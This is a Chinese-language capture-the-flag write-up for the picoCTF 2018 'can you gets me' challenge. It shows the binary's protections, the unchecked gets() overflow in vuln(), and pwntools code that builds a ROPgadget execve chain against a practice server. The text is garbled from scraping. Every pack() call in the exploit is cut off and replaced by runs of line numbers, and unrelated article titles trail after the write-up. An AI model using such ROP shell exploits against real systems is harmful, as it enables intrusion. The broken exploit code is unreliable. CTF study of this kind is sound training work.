-
picoctf_2018_can_you_gets_me
picoctf_2018_can_you_gets_me
Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)- 1
- 2
- 3
- 4
- 5
32位,只开了NX
拿到这么大的程序,直接ROPchain看看
#!/usr/bin/env python2 # execve generated by ROPgadget from struct import pack # Padding goes here p = '' p += pack('- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
果不其然
然后去ida看看溢出点
int vuln() { char v1[24]; // [esp+0h] [ebp-18h] BYREF puts("GIVE ME YOUR NAME!"); return gets(v1); }- 1
- 2
- 3
- 4
- 5
- 6
- 7
秒了
思路
栈溢出直接ROPchain
from pwn import* from Yapack import * r,elf=rec("node4.buuoj.cn",25457,"./pwn",10) context(os='linux', arch='i386',log_level='debug') def pwn(): from struct import pack # Padding goes here p = cyclic(0x1c)+b'' p += pack('- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
一个小技巧:用ROPchain,可以用def写好,这样复制过去就不用删空格了
现代C++、STL、QTL的使用
Java中的抽象类和接口的区别
macOS 13.6 及后续系统安装 Asahi Linux 将破坏引导
suanfa2==选择排序
现代 CMake 模块化项目管理指南
MongoDB 数据库(一):MongoDB的介绍与安装
QQ plot 的解读
十二、虚拟 DOM 和 render() 函数(2)
深入浅出 testing-library